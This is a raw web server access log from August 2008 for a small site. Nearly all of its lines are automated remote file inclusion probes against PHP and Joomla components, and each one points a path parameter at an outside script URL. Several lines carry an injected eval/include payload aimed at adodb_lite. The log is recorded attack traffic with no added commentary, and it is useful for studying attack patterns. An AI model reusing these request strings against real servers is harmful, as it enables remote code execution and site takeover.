140.117.241.99 - - [19/Aug/2008:09:15:32 -0700] "GET /logs/phpSecurePages/secure.php?&cfgProgDir=http://www.netops-fr.info/remote/ident.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.19.51.194 - - [19/Aug/2008:09:15:44 -0700] "GET /logs/access_080215.log//modules/vwar/admin/admin.php?vwar_root=http://www.teampaulc.org/modules/Forums/admin/lajelid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.128.80.13 - - [19/Aug/2008:09:16:01 -0700] "GET /logs/access_080215.log//index.php?custompluginfile[]=http://www.sunflowerseminars.com/cgi-bin/php/oye.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.128.80.13 - - [19/Aug/2008:09:16:01 -0700] "GET /logs/access_080309.log//index.php?custompluginfile[]=http://www.sunflowerseminars.com/cgi-bin/php/oye.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.128.80.13 - - [19/Aug/2008:09:16:02 -0700] "GET //index.php?custompluginfile[]=http://www.sunflowerseminars.com/cgi-bin/php/oye.txt?? HTTP/1.1" 200 9908 "-" "libwww-perl/5.811" "www.dmulk.com"
64.128.80.13 - - [19/Aug/2008:09:16:03 -0700] "GET /logs//index.php?custompluginfile[]=http://www.sunflowerseminars.com/cgi-bin/php/oye.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
218.189.211.14 - - [19/Aug/2008:09:16:05 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://anakdompu.by.ru/special/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
218.189.211.14 - - [19/Aug/2008:09:16:05 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://anakdompu.by.ru/special/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
140.117.241.99 - - [19/Aug/2008:09:16:10 -0700] "GET /logs/access_080630.log/phpSecurePages/secure.php?&cfgProgDir=http://www.netops-fr.info/remote/ident.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
140.117.241.99 - - [19/Aug/2008:09:16:10 -0700] "GET /phpSecurePages/secure.php?&cfgProgDir=http://www.netops-fr.info/remote/ident.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
140.117.241.99 - - [19/Aug/2008:09:16:10 -0700] "GET /logs/phpSecurePages/secure.php?&cfgProgDir=http://www.netops-fr.info/remote/ident.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
208.98.1.215 - - [19/Aug/2008:09:16:21 -0700] "GET /logs/access_080211.log/upload.php?path=[path]http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
208.98.1.215 - - [19/Aug/2008:09:16:21 -0700] "GET /upload.php?path=[path]http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
208.98.1.215 - - [19/Aug/2008:09:16:21 -0700] "GET /logs/upload.php?path=[path]http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
208.75.148.34 - - [19/Aug/2008:09:16:33 -0700] "GET //playing.php/common/db.php?commonpath=http://www.ireo.org//administrator/components/com_joomla-visites/core/include/paddy?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
217.151.80.21 - - [19/Aug/2008:09:16:37 -0700] "GET /logs/access_080530.log//modules/Neos_Chronos/header.php?base_folder=http://star.jbsc.ac.kr/technote/config/menu/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.61.106.55 - - [19/Aug/2008:09:16:37 -0700] "GET /logs/access_080807.log/phphtml.php?htmlclass_path=http://www.persianplatform.com//groups/gallery/id.txt?? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.dmulk.com"
217.151.80.21 - - [19/Aug/2008:09:16:38 -0700] "GET /logs/access_080715.log//modules/Neos_Chronos/header.php?base_folder=http://star.jbsc.ac.kr/technote/config/menu/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
82.194.76.177 - - [19/Aug/2008:09:16:38 -0700] "GET /logs/access_080209.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.hatcon.com.sa/images/log?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.61.106.55 - - [19/Aug/2008:09:16:44 -0700] "GET /logs/access_080524.log/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://fdp.de/vorschaltseite/did.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.61.106.55 - - [19/Aug/2008:09:16:45 -0700] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://fdp.de/vorschaltseite/did.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
67.19.51.194 - - [19/Aug/2008:09:17:05 -0700] "GET /logs/access_080218.log//modules/vwar/admin/admin.php?vwar_root=http://www.teampaulc.org/modules/Forums/admin/lajelid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.150.189.10 - - [19/Aug/2008:09:17:07 -0700] "GET /logs/access_080630.log/phpSecurePages/secure.php?&cfgProgDir=http://xvascainox7.sites.uol.com.br/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
200.150.189.10 - - [19/Aug/2008:09:17:07 -0700] "GET /logs/phpSecurePages/secure.php?&cfgProgDir=http://xvascainox7.sites.uol.com.br/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
200.150.189.10 - - [19/Aug/2008:09:17:07 -0700] "GET /phpSecurePages/secure.php?&cfgProgDir=http://xvascainox7.sites.uol.com.br/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
75.69.246.191 - - [19/Aug/2008:09:17:14 -0700] "GET /logs/access_080218.log//modules/vwar/admin/admin.php?vwar_root=http://veldink.com/leqi/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.52.66.242 - - [19/Aug/2008:09:17:18 -0700] "GET /logs/lostpasswd.php?env[include_prefix]=http://www.talksurrey.ca/net/ngibul/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
74.52.66.242 - - [19/Aug/2008:09:17:19 -0700] "GET /lostpasswd.php?env[include_prefix]=http://www.talksurrey.ca/net/ngibul/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.185.237.191 - - [19/Aug/2008:09:17:20 -0700] "GET /logs/access_080130.log//admin/spaw/spaw_control.class.php?spaw_root=http://www.gugn.ru/news/data/archives/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.185.237.191 - - [19/Aug/2008:09:17:20 -0700] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://www.gugn.ru/news/data/archives/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.185.237.191 - - [19/Aug/2008:09:17:20 -0700] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://www.gugn.ru/news/data/archives/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
218.189.211.14 - - [19/Aug/2008:09:17:20 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://anakdompu.by.ru/special/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.185.237.191 - - [19/Aug/2008:09:17:20 -0700] "GET /logs/access_071216.log//admin/spaw/spaw_control.class.php?spaw_root=http://www.gugn.ru/news/data/archives/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
218.189.211.14 - - [19/Aug/2008:09:17:22 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://anakdompu.by.ru/special/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.64.79.59 - - [19/Aug/2008:09:17:29 -0700] "GET /logs/facileforms.frame.php?ff_compath=http://yoda3000.de/cache/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.64.79.59 - - [19/Aug/2008:09:17:29 -0700] "GET /logs/facileforms.frame.php?ff_compath=http://yoda3000.de/cache/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.64.79.59 - - [19/Aug/2008:09:17:30 -0700] "GET /facileforms.frame.php?ff_compath=http://yoda3000.de/cache/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.64.79.59 - - [19/Aug/2008:09:17:30 -0700] "GET /facileforms.frame.php?ff_compath=http://yoda3000.de/cache/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
75.69.246.191 - - [19/Aug/2008:09:17:39 -0700] "GET /logs/access_080215.log%20//modules/vwar/admin/admin.php?vwar_root=http://veldink.com/leqi/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
76.9.3.130 - - [19/Aug/2008:09:17:43 -0700] "GET /logs/phpSecurePages/secure.php?&cfgProgDir=http://aocbots.com/cms/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
76.9.3.130 - - [19/Aug/2008:09:17:43 -0700] "GET /phpSecurePages/secure.php?&cfgProgDir=http://aocbots.com/cms/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
140.117.241.99 - - [19/Aug/2008:09:17:44 -0700] "GET /logs/access_080130.log//admin/spaw/spaw_control.class.php?spaw_root=http://bugise.com/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
140.117.241.99 - - [19/Aug/2008:09:17:45 -0700] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://bugise.com/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
140.117.241.99 - - [19/Aug/2008:09:17:45 -0700] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://bugise.com/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
140.117.241.99 - - [19/Aug/2008:09:17:45 -0700] "GET /logs/access_071216.log//admin/spaw/spaw_control.class.php?spaw_root=http://bugise.com/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
75.69.246.191 - - [19/Aug/2008:09:17:52 -0700] "GET /logs/access_080118.log%20//modules/vwar/admin/admin.php?vwar_root=http://veldink.com/leqi/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
82.194.76.177 - - [19/Aug/2008:09:18:00 -0700] "GET /errors.php?error=http://www.hatcon.com.sa/images/log?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.25.160.1 - - [19/Aug/2008:09:18:02 -0700] "GET /logs/access_080329.log//index.php?option=com_custompages&cpage=http://bugise.com/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.25.160.1 - - [19/Aug/2008:09:18:02 -0700] "GET //index.php?option=com_custompages&cpage=http://bugise.com/id1.txt?? HTTP/1.1" 200 9887 "-" "libwww-perl/5.803" "www.dmulk.com"
69.61.106.55 - - [19/Aug/2008:09:18:05 -0700] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://fdp.de/vorschaltseite/did.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
217.25.160.1 - - [19/Aug/2008:09:18:07 -0700] "GET /logs//index.php?option=com_custompages&cpage=http://bugise.com/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.135.41.76 - - [19/Aug/2008:09:18:52 -0700] "GET /logs/lostpasswd.php?env[include_prefix]=http://www.talksurrey.ca/net/ngibul/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.135.41.76 - - [19/Aug/2008:09:18:52 -0700] "GET /lostpasswd.php?env[include_prefix]=http://www.talksurrey.ca/net/ngibul/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
77.221.130.9 - - [19/Aug/2008:09:19:15 -0700] "GET /logs/access_080130.log//admin/spaw/spaw_control.class.php?spaw_root=http://www.gugn.ru/news/data/archives/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.221.130.9 - - [19/Aug/2008:09:19:17 -0700] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://www.gugn.ru/news/data/archives/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.221.130.9 - - [19/Aug/2008:09:19:17 -0700] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://www.gugn.ru/news/data/archives/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.221.130.9 - - [19/Aug/2008:09:19:18 -0700] "GET /logs/access_071216.log//admin/spaw/spaw_control.class.php?spaw_root=http://www.gugn.ru/news/data/archives/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.185.237.191 - - [19/Aug/2008:09:19:26 -0700] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://www.gugn.ru/news/data/archives/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
217.25.160.1 - - [19/Aug/2008:09:19:35 -0700] "GET /logs/access_080324.log//admin/spaw/spaw_control.class.php?spaw_root=http://bugise.com/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.25.160.1 - - [19/Aug/2008:09:19:36 -0700] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://bugise.com/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.25.160.1 - - [19/Aug/2008:09:19:36 -0700] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://bugise.com/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
140.117.241.99 - - [19/Aug/2008:09:19:48 -0700] "GET /logs/access_080626.log/phpSecurePages/secure.php?&cfgProgDir=http://www.netops-fr.info/remote/ident.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.25.160.1 - - [19/Aug/2008:09:19:48 -0700] "GET /logs/access_080131.log//admin/spaw/spaw_control.class.php?spaw_root=http://bugise.com/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.249.67.201 - - [19/Aug/2008:09:20:14 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/thumbs/thumbs_img_0136_0.jpg HTTP/1.1" 304 - "-" "Googlebot-Image/1.0" "dmulk.com"
67.19.51.194 - - [19/Aug/2008:09:20:38 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.teampaulc.org/modules/Forums/admin/lajelid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "dmulk.com"
140.117.241.99 - - [19/Aug/2008:09:20:40 -0700] "GET /logs/access_080324.log//admin/spaw/spaw_control.class.php?spaw_root=http://bugise.com/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.25.160.1 - - [19/Aug/2008:09:21:00 -0700] "GET /logs/access_080524.log//index.php?option=com_custompages&cpage=http://bugise.com/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.61.106.55 - - [19/Aug/2008:09:21:35 -0700] "GET /logs/access_080209.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://fdp.de/vorschaltseite/did.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.61.106.55 - - [19/Aug/2008:09:21:35 -0700] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://fdp.de/vorschaltseite/did.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.61.106.55 - - [19/Aug/2008:09:21:51 -0700] "GET /logs/access_080320.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://fdp.de/vorschaltseite/did.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.61.106.55 - - [19/Aug/2008:09:21:51 -0700] "GET /logs/access_080808.log/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.persianplatform.com//groups/gallery/id.txt?? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.dmulk.com"
66.197.234.53 - - [19/Aug/2008:09:21:57 -0700] "GET /logs/access_080329.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.aquaplant-chile.cl/albums/assscmd.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
77.221.130.9 - - [19/Aug/2008:09:22:14 -0700] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://www.gugn.ru/news/data/archives/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
65.55.211.30 - - [19/Aug/2008:09:22:35 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
65.55.211.30 - - [19/Aug/2008:09:22:36 -0700] "GET /bikes/dteel/ HTTP/1.1" 200 2894 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
65.55.211.36 - - [19/Aug/2008:09:22:49 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
65.55.211.36 - - [19/Aug/2008:09:22:50 -0700] "GET /minamijewelry/?S=D HTTP/1.1" 200 2110 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
93.80.187.17 - - [19/Aug/2008:09:22:50 -0700] "GET /logs/access_080202.log HTTP/1.0" 200 393216 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.dmulk.com"
217.25.160.1 - - [19/Aug/2008:09:22:53 -0700] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://bugise.com/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.25.160.1 - - [19/Aug/2008:09:22:53 -0700] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://bugise.com/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.227.65.79 - - [19/Aug/2008:09:22:54 -0700] "GET /logs//convert/mvcw_conver.php?step=1&vwar_root=http://pediatric-neurology-paris.net/media/install_41aca995b9171/patch/includes/vsc/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
212.227.65.79 - - [19/Aug/2008:09:22:54 -0700] "GET //convert/mvcw_conver.php?step=1&vwar_root=http://pediatric-neurology-paris.net/media/install_41aca995b9171/patch/includes/vsc/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
75.69.246.191 - - [19/Aug/2008:09:23:06 -0700] "GET /logs/access_080615.log//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://idar.no-ip.org/sanmateo/images/admin/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.150.189.10 - - [19/Aug/2008:09:23:21 -0700] "GET /logs/access_080626.log/phpSecurePages/secure.php?&cfgProgDir=http://xvascainox7.sites.uol.com.br/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
208.98.1.215 - - [19/Aug/2008:09:23:23 -0700] "GET /logs/access_080117.log/upload.php?path=[path]http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
82.194.76.177 - - [19/Aug/2008:09:23:27 -0700] "GET /logs/access_080806.log/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.hatcon.com.sa/images/log?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.194.76.177 - - [19/Aug/2008:09:23:27 -0700] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.hatcon.com.sa/images/log?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.194.76.177 - - [19/Aug/2008:09:23:28 -0700] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.hatcon.com.sa/images/log?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.172.182.209 - - [19/Aug/2008:09:23:34 -0700] "GET /logs//convert/mvcw_conver.php?step=1&vwar_root=http://pediatric-neurology-paris.net/media/install_41aca995b9171/patch/includes/vsc/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.172.182.209 - - [19/Aug/2008:09:23:35 -0700] "GET //convert/mvcw_conver.php?step=1&vwar_root=http://pediatric-neurology-paris.net/media/install_41aca995b9171/patch/includes/vsc/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.61.106.55 - - [19/Aug/2008:09:23:49 -0700] "GET /phphtml.php?htmlclass_path=http://fdp.de/vorschaltseite/did.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
89.218.85.18 - - [19/Aug/2008:09:24:09 -0700] "GET /logs/access_080803.log/index1.php?var=http://www.voipanywhere.pt/modules/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [19/Aug/2008:09:24:09 -0700] "GET /logs/index1.php?var=http://www.voipanywhere.pt/modules/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [19/Aug/2008:09:24:10 -0700] "GET /index1.php?var=http://www.voipanywhere.pt/modules/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [19/Aug/2008:09:24:10 -0700] "GET /index1.php?var=http://www.voipanywhere.pt/modules/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.79.66.105 - - [19/Aug/2008:09:24:13 -0700] "GET /logs/access_080714.log//dotproject//includes/db_connect.php?baseDir=http://warsector.ru/access2006.log??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.79.66.105 - - [19/Aug/2008:09:24:14 -0700] "GET //dotproject//includes/db_connect.php?baseDir=http://warsector.ru/access2006.log??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.46.23.105 - - [19/Aug/2008:09:24:15 -0700] "GET /show.php?product=http://www.ulisse-bici.org/tb1tl33.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
194.79.66.105 - - [19/Aug/2008:09:24:15 -0700] "GET /logs//dotproject//includes/db_connect.php?baseDir=http://warsector.ru/access2006.log??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.194.76.177 - - [19/Aug/2008:09:24:30 -0700] "GET /logs/access_080730.log/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.hatcon.com.sa/images/log?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.185.237.191 - - [19/Aug/2008:09:24:34 -0700] "GET //admin/includes/admin_header.php?level=http://www.gugn.ru/news/data/archives/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
69.46.23.105 - - [19/Aug/2008:09:24:37 -0700] "GET /show.php?product=http://www.ulisse-bici.org/tb1tl33.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
212.241.217.251 - - [19/Aug/2008:09:24:41 -0700] "GET /logs/access_080731.log/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.freewebs.com/lostmind7/idv6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.221.130.9 - - [19/Aug/2008:09:24:53 -0700] "GET //admin/includes/admin_header.php?level=http://www.gugn.ru/news/data/archives/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.46.23.105 - - [19/Aug/2008:09:25:12 -0700] "GET /trans/trans.php?trans=eng&page=http://www.ulisse-bici.org/tb1tl33.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
69.46.23.105 - - [19/Aug/2008:09:25:30 -0700] "GET /logs/access_080327.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.ulisse-bici.org/tb1tl33.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
69.46.23.105 - - [19/Aug/2008:09:25:30 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.ulisse-bici.org/tb1tl33.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
69.46.23.105 - - [19/Aug/2008:09:25:30 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.ulisse-bici.org/tb1tl33.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
212.92.23.89 - - [19/Aug/2008:09:26:06 -0700] "GET /logs//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.skilful.nu/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.197.234.53 - - [19/Aug/2008:09:26:16 -0700] "GET //administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.aquaplant-chile.cl/albums/assscmd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
200.203.121.1 - - [19/Aug/2008:09:26:29 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://vncx.t35.com/scan/idnew.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
200.203.121.1 - - [19/Aug/2008:09:26:29 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://vncx.t35.com/scan/idnew.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
200.203.121.1 - - [19/Aug/2008:09:26:29 -0700] "GET /logs/access_080410.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://vncx.t35.com/scan/idnew.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
200.203.121.1 - - [19/Aug/2008:09:26:35 -0700] "GET /logs/access_080730.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://vncx.t35.com/scan/idnew.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
69.64.79.59 - - [19/Aug/2008:09:26:48 -0700] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://yoda3000.de/cache/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.64.79.59 - - [19/Aug/2008:09:26:48 -0700] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://yoda3000.de/cache/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
65.55.211.36 - - [19/Aug/2008:09:26:49 -0700] "GET /minamijewelry/?S=A HTTP/1.1" 200 2110 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
